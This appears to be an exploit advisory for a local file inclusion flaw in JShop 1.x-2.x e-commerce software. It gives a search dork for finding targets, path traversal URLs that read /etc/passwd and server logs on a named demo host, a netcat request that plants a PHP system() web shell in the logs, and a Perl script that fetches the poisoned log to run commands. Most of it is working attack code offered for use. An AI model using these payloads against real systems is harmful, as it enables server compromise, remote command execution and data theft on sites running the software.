JShop 1.x-2.x local file include --------------------------------------------------------------------------------------------------------------------- + scripts: Jshop Server 1.x-2.x + + Discovered By : v0l4arrra + + url: www.jshop.co.uk + + dork: "powered by jshop" and also usefull one "allinurl:jssCart=.." + --------------------------------------------------------------------------------------------------------------------- Go to www.jshop.co.uk and check out demo version... http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00 Then u can upload for example the gif file like this $cat 1.gif GIF89aD or do it like me: $nc www.jshopecommerce.com 80 GET '; echo system($_GET['cmd']); echo ''; ?> HTTP/1.1 Host: www.jshopecommerce.com ................................................................................................................ and simple parse the output of error log with lame perl script: #!/usr/bin/env perl use strict; use warnings; ##################################### # This script download log file # # and grep the result of the # # command in tags .. # # and print it.. # ##################################### use LWP::UserAgent; use HTTP::Request::Common; $| = 1; my $url = $ARGV[0] or print "usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\n" and exit; my $ua= new LWP::UserAgent; $ua->agent("Mozilla/5.0"); my $request = new HTTP::Request( 'GET' => $url ); my $document = $ua->request($request); my $response = $document->as_string; $response =~ m%(.*?)%is; print $1,"\n"; ###################################### so dont waste your time and check it now http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa ##########################################